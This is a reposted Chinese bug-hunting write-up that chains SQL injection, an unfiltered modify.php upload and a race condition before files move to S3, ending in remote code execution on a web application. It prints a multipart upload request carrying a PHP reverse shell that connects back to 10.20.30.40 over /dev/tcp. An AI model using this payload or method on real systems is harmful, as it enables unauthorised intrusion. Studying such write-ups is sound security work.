利用競(jìng)爭(zhēng)條件對(duì)目標(biāo)Web應(yīng)用實(shí)現(xiàn)RCE的示例分析，相信很多沒(méi)有經(jīng)驗(yàn)的人對(duì)此束手無(wú)策，為此本文總結(jié)了問(wèn)題出現(xiàn)的原因和解決方法，通過(guò)這篇文章希望你能解決這個(gè)問(wèn)題。

創(chuàng)新互聯(lián)專業(yè)為企業(yè)提供永昌網(wǎng)站建設(shè)、永昌做網(wǎng)站、永昌網(wǎng)站設(shè)計(jì)、永昌網(wǎng)站制作等企業(yè)網(wǎng)站建設(shè)、網(wǎng)頁(yè)設(shè)計(jì)與制作、永昌企業(yè)網(wǎng)站模板建站服務(wù)，十多年永昌做網(wǎng)站經(jīng)驗(yàn)，不只是建網(wǎng)站，更提供有價(jià)值的思路和整體網(wǎng)絡(luò)服務(wù)。

通過(guò)對(duì)SQL注入和競(jìng)爭(zhēng)條件（Race Condition）的組合利用，利用上傳文件到服務(wù)器和服務(wù)器轉(zhuǎn)移上傳文件到Amazon S3的時(shí)間差，最終實(shí)現(xiàn)了對(duì)目標(biāo)應(yīng)用的RCE漏洞。由于該RCE漏洞的發(fā)現(xiàn)相對(duì)獨(dú)特，所以下面著重從競(jìng)爭(zhēng)條件（Race Condition）的觸發(fā)機(jī)制說(shuō)起，和大家分享。

競(jìng)爭(zhēng)條件（Race Condition）：計(jì)算機(jī)運(yùn)行過(guò)程中，并發(fā)、無(wú)序、大量的進(jìn)程在使用有限、獨(dú)占、不可搶占的資源，由于進(jìn)程無(wú)限，資源有限，產(chǎn)生矛盾，這種矛盾稱為競(jìng)爭(zhēng)（Race）。競(jìng)爭(zhēng)條件（Race Condition）旨在描述一個(gè)系統(tǒng)或者進(jìn)程的輸出依賴于不受控制的事件出現(xiàn)順序或者出現(xiàn)時(shí)機(jī)。由于兩個(gè)或者多個(gè)進(jìn)程競(jìng)爭(zhēng)使用不能被同時(shí)訪問(wèn)的資源，使得這些進(jìn)程有可能因?yàn)闀r(shí)間上推進(jìn)的先后原因而出現(xiàn)問(wèn)題。

漏洞詳情

第一個(gè)上傳功能點(diǎn)upload.php

這里的前提是，我已經(jīng)通過(guò)SQL注入獲取到了目標(biāo)Web應(yīng)用的管理員賬戶憑據(jù)，然后登錄到其內(nèi)部管理界面后，我發(fā)現(xiàn)可通過(guò)該管理面板中的upload.php功能發(fā)布新聞或文章：

沒(méi)做太多考慮，我就直接通過(guò)upload.php嘗試上傳了一個(gè).php文件shell，但問(wèn)題是該上傳功能限制了對(duì).php格式文件的上傳，在變化.PhP、.php3、phpphp、空字符等形式的繞過(guò)方法后，還是不行：

然后，我想到了存儲(chǔ)型XSS，能不能通過(guò)上傳 .html、.xml或.svg格式文件呢？這一下上傳總算成功了，但是，由于目標(biāo)Web應(yīng)用又會(huì)把用戶上傳文件轉(zhuǎn)儲(chǔ)到云端的S3存儲(chǔ)桶中去，那在S3存儲(chǔ)桶觸發(fā)XSS也沒(méi)意義了。好吧，那暫時(shí)把這個(gè)問(wèn)題放一邊，來(lái)看其它的。

第二個(gè)上傳功能點(diǎn)modify.php

在沒(méi)有頭緒之時(shí)，我又返回管理面板中“news”欄目，想看看能不能在添加或編輯操作中發(fā)現(xiàn)可利用的點(diǎn)。此時(shí)，我注意到了“edit”功能，如下在這個(gè)非法上傳文件右上端，我點(diǎn)擊了其“edit”按鈕：

然后跳出了以下包含upload to replacing the file的窗口：

我想到的是，它可能也是包含了限制過(guò)濾條件吧，但事實(shí)是，它沒(méi)有任何后綴格式限制條件！可以上傳任意文件！那就上傳吧，如果沒(méi)有限制條件的話，那它調(diào)用的應(yīng)該不是之前的upload.php，確實(shí)是，它調(diào)用了另一上傳功能點(diǎn)“modify.php”，以下是它的調(diào)用請(qǐng)求格式：

Content-Disposition: form-data; name="fileid"31337-----------------------------09234599689937136550676151776Content-Disposition: form-data; name="name"picture-1.png-----------------------------09234599689937136550676151776Content-Disposition: form-data; name="description"-----------------------------09234599689937136550676151776Content-Disposition: form-data; name="userfile"; filename="reverse.php"Content-Type: text/php<?phpexec("/bin/bash -c 'bash -i >& /dev/tcp/10.20.30.40/21234 0>&1'");-----------------------------09234599689937136550676151776Content-Disposition: form-data; name="save"Save

大功告成了嗎？并沒(méi)有。目標(biāo)Web應(yīng)用之后還會(huì)把用戶上傳文件轉(zhuǎn)儲(chǔ)上傳到云端S3存儲(chǔ)桶中去，也就是說(shuō)，如果被傳到S3中去，在目標(biāo)Web應(yīng)用的服務(wù)器中，我們也沒(méi)shell可反彈了。    

競(jìng)爭(zhēng)條件（Race Condition）響應(yīng)錯(cuò)誤獲得本地文件路徑

此時(shí)，毫無(wú)頭緒之際，我通過(guò)burpsuite的 intruder 模式上傳操作中，發(fā)現(xiàn)了響應(yīng)長(zhǎng)度的異常。有時(shí)候需要發(fā)起10個(gè)左右的請(qǐng)求，有時(shí)候則需要發(fā)起20–30個(gè)請(qǐng)求，才會(huì)出現(xiàn)這樣的響應(yīng)異常。正常來(lái)說(shuō)，多數(shù)請(qǐng)求的響應(yīng)長(zhǎng)度為1147，但奇怪的是，在其中，會(huì)夾雜著長(zhǎng)度為1710的響應(yīng)。如多次上傳空內(nèi)容的rc.php，其請(qǐng)求樣式為：

以下是正常的長(zhǎng)度為1147的響應(yīng)：

以下則是異常的長(zhǎng)度為1710的響應(yīng)，其中竟然返回了我們上傳的php文件的本地路徑：

本想著，有了這個(gè)路徑，那么完全就可以實(shí)現(xiàn)監(jiān)聽(tīng)反彈了，但其實(shí)不然。當(dāng)我通過(guò)瀏覽器訪問(wèn)該上傳php文件后，Web應(yīng)用返回了“File not Found”的提示，經(jīng)再次檢查后發(fā)現(xiàn)，該文件路徑已經(jīng)對(duì)應(yīng)成了S3存儲(chǔ)桶的路徑了，所以，因此我猜測(cè)，我們的上傳文件被目標(biāo)Web應(yīng)用移動(dòng)到云端S3之前，在Web應(yīng)用服務(wù)器中保存的時(shí)間大概會(huì)是短暫的1到2秒。

用競(jìng)爭(zhēng)條件（Race Condition）反彈Shell并實(shí)現(xiàn)RCE

根據(jù)以上的時(shí)間猜測(cè)，我就有一個(gè)想法：如果我們從客戶端來(lái)觸發(fā)競(jìng)爭(zhēng)條件，通過(guò)瀏覽器反復(fù)請(qǐng)求上傳文件路徑，以此來(lái)爭(zhēng)取對(duì)其的訪問(wèn)占有權(quán)限，這樣的做法是否可行？

也就是：

在我們shell反彈服務(wù)器中設(shè)置端口監(jiān)聽(tīng) -> 上傳我們的反彈shell文件 -> 發(fā)起多個(gè)請(qǐng)求執(zhí)行競(jìng)爭(zhēng)條件 -> 獲取長(zhǎng)度異常的響應(yīng) -> 從中獲取上傳shell文件路徑并用瀏覽器訪問(wèn)并不斷刷新（CTRL+R） -> 以這種方式再次讓目標(biāo)Web應(yīng)用處于競(jìng)爭(zhēng)條件下, 我們就占有了對(duì)上傳shell文件的繼續(xù)訪問(wèn)權(quán)。

一試，果然行。以下是觸發(fā)反彈shell實(shí)現(xiàn)RCE的競(jìng)爭(zhēng)條件邏輯圖：

nc端監(jiān)聽(tīng)返回的RCE結(jié)果：

看完上述內(nèi)容，你們掌握利用競(jìng)爭(zhēng)條件對(duì)目標(biāo)Web應(yīng)用實(shí)現(xiàn)RCE的示例分析的方法了嗎？如果還想學(xué)到更多技能或想了解更多相關(guān)內(nèi)容，歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道，感謝各位的閱讀！

網(wǎng)頁(yè)名稱：利用競(jìng)爭(zhēng)條件對(duì)目標(biāo)Web應(yīng)用實(shí)現(xiàn)RCE的示例分析
轉(zhuǎn)載注明：http://chinadenli.net/article34/joijpe.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供網(wǎng)站設(shè)計(jì)、App設(shè)計(jì)、ChatGPT、Google、軟件開(kāi)發(fā)、

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來(lái)源： 創(chuàng)新互聯(lián)